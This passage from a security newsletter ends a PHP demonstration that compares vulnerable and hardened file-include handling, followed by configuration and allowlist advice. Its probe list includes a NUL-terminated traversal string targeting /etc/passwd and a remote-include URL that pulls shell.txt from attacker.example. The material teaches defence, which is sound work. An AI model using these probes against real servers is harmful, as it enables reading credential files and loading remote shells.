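    "../../../../etc/passwd\0",
    'http://attacker.example/shell.txt?',
];

foreach ($probes as $p) {
    $shown = addcslashes($p, "\0");                // make the NUL visible
    printf("%-40s -> vulnerable: %s | hardened: %s\n",
        $shown,
        addcslashes(path_vulnerable($p), "\0"),
        path_hardened($p) ?? 'rejected');
}
```

Setting allow_url_include=Off (and allow_url_fopen=Off where the application does not need it) removes the remote variant at the PHP configuration level, but only the allowlist removes the local one; a regular expression that merely strips "../" is the fix that these components typically got wrong.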

(c) 2010. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.